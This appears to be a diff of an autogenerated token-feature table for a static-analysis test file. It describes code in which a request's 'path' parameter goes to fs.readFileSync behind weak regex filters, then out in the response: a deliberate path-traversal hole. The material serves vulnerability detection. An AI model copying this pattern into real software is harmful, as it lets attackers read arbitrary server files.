+| autogenerated/TaintedPath/TaintedPath.js:171:13:171:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6057,6 +63990,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:171:13:171:54 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:171:16:171:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:16:171:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:16:171:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:16:171:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:16:171:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | path.re ... /g, '') | calleeImports | fs | @@ -6066,6 +64019,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:171:29:171:53 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:171:34:171:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:34:171:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:171:34:171:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:171:34:171:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:171:34:171:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:171:42:171:48 | /[./]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:171:42:171:48 | /[./]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:171:42:171:48 | /[./]/g | calleeImports | url | @@ -6084,6 +64042,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:171:51:171:52 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:171:51:171:52 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:171:51:171:52 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:3:172:66 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:7:172:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:7:172:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:7:172:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:7:172:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:7:172:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6092,6 +64090,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:172:13:172:65 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:172:16:172:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:16:172:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:172:16:172:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync 